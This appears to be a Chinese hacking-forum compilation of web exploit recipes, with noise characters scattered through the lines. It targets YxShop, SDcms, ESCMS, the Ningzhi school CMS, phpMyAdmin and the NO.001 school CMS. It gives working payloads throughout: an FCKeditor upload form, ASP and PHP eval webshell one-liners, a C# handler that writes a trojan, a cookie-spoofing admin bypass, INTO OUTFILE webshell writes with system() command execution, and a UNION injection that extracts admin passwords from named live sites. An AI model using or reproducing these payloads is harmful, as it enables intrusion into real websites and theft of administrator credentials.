; Y# G+ \( o8 O# I4 i* S
YxShop易想购物商城4.7.1版本任意文件上传漏洞
% b2 g+ ^/ @% z- |* ^& A
/ Z5 \4 a1 \9 p# phttp://xxoo.com/controls/fckedit ... aspx/connector.aspx# H d7 Z! ]0 D
跳转到网站根目录上传任意文件。
' W6 |9 V' ]+ X0 m8 P& w* p* n如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件1 x+ K4 Y+ a- P- B& W. @
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">. {; \9 N. u# P. N$ x6 t& q0 \
Upload a new file:<br>
4 K0 |- B* ~/ \7 m' Q3 b<input type="file" name="NewFile" size="50"><br>" W0 q, c1 n6 ~: x5 D: H9 Z) B" L
<input id="btnUpload" type="submit" value="Upload"> m( Z# l+ l. }& [- y u$ O- g% n
</form>
, F: w% K+ N4 M' I. T& J: n0 G& y! @-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 o2 \2 D( T! ^) u0 W" i/ w7 y
! u! N2 h3 A$ @6 P/ |SDcms 后台拿webshell D4 F4 ?4 G+ Z1 \: x& G
. {! e0 M0 B% t$ n% l+ X, T3 K3 ~ L第一种方法:2 l" U- u/ ]" h4 n0 [
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
8 j, \& P- b- e3 f7 N" o& E0 V把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
% R: E1 }4 X$ a: c- |# R4 L3 {5 Q% j用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
3 K$ o. I' Q" o2 t& {! N第二种方法:# _! b! ]% z" {1 V0 g
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
0 z1 ?- b& K5 t3 P在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
) b+ V' z6 M8 L第三种方法:
% g* D, t( z3 H K进入后台-->界面管理-->模板文件管理-->创建文件5 A9 t: n8 g( C
文件名写入getshell.ashx
# B8 J6 ^- N. Y% F0 W内容写入下面内容:# {4 m- N- n9 \3 V& F" R
/====================复制下面的=========================/. P j5 N7 h1 [0 f" T
<%@ WebHandler Language="C#" Class="Handler" %>
* O2 U& T3 u5 V7 X% B6 ]! |+ C& Eusing System;
L* D4 O3 {. j0 Husing System.Web;
0 ^+ f: E w" X7 R3 Husing System.IO;
. A% ~& R. H, Y( Ypublic class Handler : IHttpHandler {1 ?, S" `$ E( q; R" {% r* O
public void ProcessRequest (HttpContext context) {
; }0 k& z: V* X5 B. P$ M0 ccontext.Response.ContentType = "text/plain";% ~- d* k; F( @* ]4 [' W
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
8 {* m/ P/ V/ x5 y9 Mfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");! N$ ` o! b: b7 P
file1.Flush();0 _ v8 s7 a+ z/ N2 r# H
file1.Close();
# Q5 U) j/ w; n}6 U. N: k$ H; M- }0 { M
public bool IsReusable {" L6 l9 C/ O( Z% @' F$ u
get {* b% @; i) q2 f2 B# t0 h9 m
return false;
, S% ?* K4 ]0 { ^2 X: O7 S( |" M; ~}+ i3 p Z7 N/ R& S f1 B
}& N( P6 `3 _, O" T
}
) { M8 X) ]! H4 i) ?6 ]/=============================================/
, F' }; j+ l J# G访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
: H, m+ O9 ]" E8 @5 S2 w会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接1 ^" o6 L0 u$ d/ Q0 z4 j. a* {
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: i: X+ D& |5 t% v
4 Y& t, ~3 `! v* n* HESCMS网站管理系统0day" O' L5 F4 X/ C! ]# ~
$ b3 V# S9 P9 A5 P9 |
后台登陆验证是通过admin/check.asp实现的
( ~/ \8 z% v2 B$ T7 F% w" K0 K! B- x- } ~
首先我们打开http://target.com/admin/es_index.html
5 z* P9 [8 g1 z5 t' w7 B然后在COOKIE结尾加上
, y( k; E6 R- q: x5 Z; ESCMS$_SP2=ES_admin=st0p;
, H7 r! I9 _7 H7 g5 b修改,然后刷新# L1 I! z6 U- I! T
进后台了嘎..
* t! s7 v, ?/ C; l* N然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL% ^; l( Z5 u% k( J4 N4 U
8 j/ a9 k. z9 E# O2 r) J& i利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
% H, r4 l5 @; Z, y* W( G( u嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp7 x8 Z) W! ^7 k |3 o1 p7 f8 n
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
) U" [1 m K" T3 m) a; I) y在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了: e' W' n, C2 Y; a; b* K
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Q: c+ L6 M- u; ~ u+ l
0 ^) `$ j: d0 y4 p宁志网站管理系统后台无验证漏洞及修复
; \# K2 i4 c" g* X6 `" z1 y5 o* y Q3 X. H: ?; Q
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
% n D. f b8 c. b8 U官方网站:www.ningzhi.net+ }* z# q% I' R% Y( ~ P& u7 @
学校网站管理系统 V.2011版本 . x7 q# j3 r2 [0 V3 e7 L2 L2 b5 E; ?( d
http://down.chinaz.com/soft/29943.htm 2 a$ w9 T; d) N7 g6 R2 s0 i
其它版本(如:政府版等),自行下载.
l$ J( l" n/ c9 w3 ]2 H8 f. c( L漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
( T. N( Q* _$ P/ y+ f; |login.asp代码如下:
4 | K+ l# A* E/ f1 }<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> ( X( ^. T9 K9 K" a$ m( J
manage.asp代码我就不帖出来了.反正也没验证.. y5 m' O" f6 d8 }1 k% l8 ^
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
7 f% d' v# V+ ]- E$ O/ S, Y$ d漏洞利用:9 S: g, ~1 r- H B3 m0 V9 y
直接访问http://www.0855.tv/admin/manage.asp
6 `% m" m" \2 T6 v- v$ i数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5+ T2 h; O4 A! l! A/ r2 l
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 l6 E% W7 m$ T D8 o! B- E- a. \! C, m
phpmyadmin拿shell的四种方法总结及修复
/ w, {! z$ P: C- ^, ]( ?
$ Y' z# u( J ^4 _8 K! c- o% R方法一:
B1 q5 X. s. q1 X7 d) ~2 ZCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
2 k' i- o; H: A$ L% \2 v: `) ZINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
7 k% A/ j+ H3 H- kSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';) Y) N; \5 n* Z/ q, l
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
1 X8 ?- R2 n9 M/ p0 y) a 一句话连接密码:7on
+ T9 ]7 P* ?9 Q7 V方法二:
8 T7 Z* b" C) |. T1 [8 a读取文件内容: select load_file('E:/xamp/www/s.php');
+ Z! H7 g( s, U$ U; \8 F! S写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php' ~5 e3 a# S! v% `
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'" z- J" }- w' _" H$ a3 h! E3 ~
方法三:+ E# f, q4 ~& {; r6 u
JhackJ版本 PHPmyadmin拿shell* y3 P# x( w0 n0 H
Create TABLE study (cmd text NOT NULL);3 l9 f- j+ r, I/ p6 ]# w) K( T- A
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
# V( F0 G5 N0 A5 a- q& v Aselect cmd from study into outfile 'E:/wamp/www/7.php';
8 @/ D$ N4 C) n& j# E- SDrop TABLE IF EXISTS study;' ~* R. N- h2 V& r
<?php eval($_POST[cmd])?>
' @1 Z/ W. l' a, j7 [ ECREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。3 D! E D& \! e( } C/ m
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
2 O7 U; _/ r! t5 H% g% X1 rSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
: m8 I, ^- I0 ], N* k# mDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
$ x4 w% M. a2 j- q方法四:
: P% f2 ]& Z( [/ e7 w' |select load_file('E:/xamp/www/study.php');
+ Y3 ]( H. `- {# h6 u* u( xselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'& B3 u2 S% y; Z; k8 [" U, p
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir! g! K5 q0 Z8 e- C* w9 q2 u2 v
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------" a/ h# P! M$ y# E
6 s$ a& u4 _- w( O
NO.001中学网站管理系统 Build 110628 注入漏洞 p* ^7 `- H$ `. X0 p& N
' Z( V4 n' m/ e' H. Q
NO.001中学网站管理系统功能模块:
" d* y5 v4 g5 e" u. s1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等7 Q% I$ g( y/ x' K3 Z, F- F
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
/ w: f3 v1 u p l2 z4 K$ _3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
7 ?- ~) H' g4 l5 X4.视频图片管理:一级分类,动态添加视频或者图片等信息/ J: O. y3 X8 o& l
5.留言管理:对留言,修改,删除、回复等管理
/ @8 G+ T$ _1 v8 [, x0 n6.校友频道:包括校友资料excel导出、管理等功能6 h& g3 M5 ^: R: X6 N
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页1 P; o1 D7 m9 Z! C
默认后台:admin/login.asp
3 O2 {- p- n. c/ ~2 o官方演示:http://demo.001cms.net/ S5 Z9 w1 W/ q/ ^
源码下载地址:http://down.chinaz.com/soft/30187.htm& [2 P! p" l) p9 C7 q) O
EXP:
( b! ^. [2 O0 Q# ?; cunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin5 e& @ y W, _$ }
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin# P e7 o4 L% K% L( I1 [- ^; T9 z6 E
getshell:后台有备份,你懂的
- Q/ R/ H( F* j4 \7 |另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。 g \7 w1 J3 v% V5 L( @( c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |